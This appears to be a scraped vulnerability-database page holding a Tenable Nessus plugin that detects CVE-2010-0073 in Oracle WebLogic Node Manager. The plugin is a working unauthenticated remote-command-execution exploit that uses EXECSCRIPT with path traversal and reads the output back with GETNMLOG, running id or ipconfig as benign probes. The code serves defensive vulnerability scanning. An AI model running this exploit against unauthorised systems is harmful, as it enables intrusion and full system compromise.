Lucene search
This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.WEBLOGIC_NODEMANAGER_CMD_EXEC.NASLHistoryJan 26, 2010 - 12:00 a.m.
Oracle WebLogic Server Node Manager Remote Command Execution
2010-01-2600:00:00
This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
88
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.082
Percentile
94.4%
The version of Node Manager listening on this port allows unauthenticated, remote attackers to execute arbitrary commands with system privileges.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(44316);
script_version("1.18");
script_cve_id("CVE-2010-0073");
script_bugtraq_id(37926);
script_name(english:"Oracle WebLogic Server Node Manager Remote Command Execution");
script_summary(english:"Tries to execute a command");
script_set_attribute(
attribute:"synopsis",
value:"The remote service allows execution of arbitrary code."
);
script_set_attribute(
attribute:"description",
value:
"The version of Node Manager listening on this port allows
unauthenticated, remote attackers to execute arbitrary commands with
system privileges."
);
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?6aee3333"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?a7d02724"
);
script_set_attribute(
attribute:"solution",
value:"Apply the fix referenced in Oracle's advisory."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2010/01/23");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/01/26");
script_cvs_date("Date: 2018/08/06 14:03:15");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"Misc.");
script_copyright(english:"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("weblogic_nodemanager_detect.nasl", "os_fingerprint.nasl");
script_require_ports("Services/weblogic_nodemanager", 5556);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("data_protection.inc");
port = get_kb_item("Services/weblogic_nodemanager");
if (!port)
{
if (service_is_unknown(port:5556)) port = 5556;
else exit(0, "The host does not appear to be running Node Manager.");
}
if (!get_port_state(port)) exit(0, "Port "+port+" is not open.");
# Initialize some variables.
domains = make_list(
'wl_server',
'medrec',
'workshop'
);
os = get_kb_item("Host/OS");
if (os)
{
if ("Windows" >< os) cmd = '/WINDOWS/System32/ipconfig.exe';
else cmd = '/usr/bin/id';
cmds = make_list(cmd);
}
else
{
cmds = make_list(
'/WINDOWS/System32/ipconfig.exe',
'/usr/bin/id'
);
}
traversal = crap(data:"../", length:3*9) + '..';
cmd_pats = make_array();
cmd_pats["id"] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats["ipconfig.exe"] = "Subnet Mask";
soc = open_sock_tcp(port);
if (!soc) exit(1, "Can't open socket on port "+port+".");
# Send a 'HELLO'.
req1 = 'HELLO ' + SCRIPT_NAME;
send(socket:soc, data:req1+'\n');
res1 = recv_line(socket:soc, length:1024);
if (strlen(res1) == 0) exit(1, "Service on port "+port+" failed to respond.");
res1 = chomp(res1);
if (res1 !~ "OK Node [Mm]anager") exit(1, "Unexpected response from port "+port+" ("+res1+").");
# Find a valid domain.
valid_domain = "";
foreach domain (domains)
{
req2 = 'DOMAIN ' + domain;
send(socket:soc, data:req2+'\n');
res2 = recv_line(socket:soc, length:1024);
if (strlen(res2) == 0) exit(1, "Service on port "+port+" failed to respond.");
if ('+OK Current domain set to ' >< res2)
{
valid_domain = domain;
break;
}
}
# If we have one...
errmsg = "";
report = "";
if (valid_domain)
{
# Try to exploit the vulnerability.
foreach cmd (cmds)
{
# Add a marker so we can find our command output.
marker = 'NESSUS_' + SCRIPT_NAME + '_' + unixtime();
req3 = 'EXECSCRIPT ' + marker;
send(socket:soc, data:req3+'\n');
res3 = recv_line(socket:soc, length:1024);
if (strlen(res3) == 0) exit(1, "Service on port "+port+" failed to respond.");
if (
report_paranoia < 2 &&
'Unable to find file "'+marker+'" in the correct service migration' >!< res3
)
{
errmsg = "Unexpected response to EXECSCRIPT message from port "+port+" ("+res3+").";
break;
}
# Now the exploit.
#
# nb: running an interactive command such as Windows' CALC.exe will likely
# result in a timeout as EXECSCRIPT waits for the command to finish.
script = traversal + cmd;
req3 = 'EXECSCRIPT ' + script;
send(socket:soc, data:req3+'\n');
res3 = recv_line(socket:soc, length:1024);
if (strlen(res3) == 0) exit(1, "Service on port "+port+" failed to respond.");
if ("+OK Script '"+script+"' executed" >< res3)
{
req4 = 'GETNMLOG';
send(socket:soc, data:req4+'\n');
got_marker = FALSE;
info = "";
while (TRUE)
{
res4 = recv_line(socket:soc, length:1024);
if (strlen(res4) == 0) exit(1, "Service on port "+port+" failed to respond.");
res4 = chomp(res4);
if (res4 == '.') break;
if (got_marker && "<Info> <" >< res4)
{
info += ereg_replace(pattern:"^.+<Info> <(.*)>$", replace:"\1", string:res4) + '\n';
}
else if ('Unable to find file "'+marker+'" in the correct service migration' >< res4) got_marker = TRUE;
}
basename = ereg_replace(pattern:"^(.*/)?", replace:"", string:cmd);
pat = cmd_pats[basename];
if (os && "Windows" >< os) cmd = str_replace(find:'/', replace:'\\', string:cmd);
if (strlen(info) && egrep(pattern:pat, string:info))
{
report = '\n' +
"Nessus was able to execute the command '" + cmd + "' on the" + '\n' +
'remote host by connecting to this port and sending the following\n' +
'four messages :\n' +
'\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
' ' + req1 + '\n' +
' ' + req2 + '\n' +
' ' + req3 + '\n' +
' ' + req4 + '\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
if (report_verbosity > 1)
{
report += '\n' +
'This produced the following output :\n' +
'\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
info + '\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
}
}
else
{
report = '\n' +
"Although Nessus did not find the expected output in Node Manager's" + '\n' +
"logs, it appears possible based on Node Manager's responses to be" + '\n' +
"able to execute the command '" + cmd + "' on the remote" + '\n' +
'host by connecting to this port and sending the following four\n' +
'messages :\n' +
'\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
' ' + req1 + '\n' +
' ' + req2 + '\n' +
' ' + req3 + '\n' +
' ' + req4 + '\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
}
}
else if ('Unable to find file "'+script+'" in the correct service migration' >< res3)
{
if (os && "Windows" >< os) cmd = str_replace(find:'/', replace:'\\', string:cmd);
report = '\n' +
"Although Nessus was not able to execute the command '" + cmd + "'" + '\n' +
'on the remote host, the vulnerability almost certainly exists and\n' +
'is likely exploitable using a different command or path.\n' +
'\n' +
'Nessus tried connecting to this port and sending the following three\n' +
'messages :\n' +
'\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
' ' + req1 + '\n' +
' ' + req2 + '\n' +
' ' + req3 + '\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
'\n' +
'The third message resulted in the following response :\n' +
'\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
' ' + data_protection::sanitize_uid(output:res3) + '\n' +
crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
}
# We're done if we have a report that indicates execution was successful;
# if it wasn't successful, we'll try another command.
if (report && "Nessus was not able to execute" >!< report) break;
}
}
# Be nice and disconnect cleanly.
req = 'QUIT';
send(socket:soc, data:req+'\n');
res = recv_line(socket:soc, length:256);
close(soc);
# Report results.
if (valid_domain)
{
if (report)
{
if (report_verbosity > 0) security_hole(port:port, extra:report);
else security_hole(port);
exit(0);
}
else if (errmsg) exit(1, errmsg);
else exit(0, "The instance of Node Manager listening on port "+port+" is not affected.");
}
else exit(1, "Failed to find a valid domain for the instance of Node Manager listening on port "+port+".");
Related
prion
prion
Code injection
2010-04-14 17:30:00
cvelist
cvelist
CVE-2010-0073
2010-04-14 17:00:00
cisa
cisa
Oracle Releases Security Alert for WebLogic Server Vulnerability
2010-02-07 00:00:00
threatpost
threatpost
Oracle Ships Critical Out-of-Band Security Patch
2010-02-05 21:21:42
openvas
openvas
nvd
nvd
CVE-2010-0073
2010-04-14 17:30:00
cve
cve
CVE-2010-0073
2010-04-14 17:30:00
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.082
Percentile
94.4%
Related for WEBLOGIC_NODEMANAGER_CMD_EXEC.NASL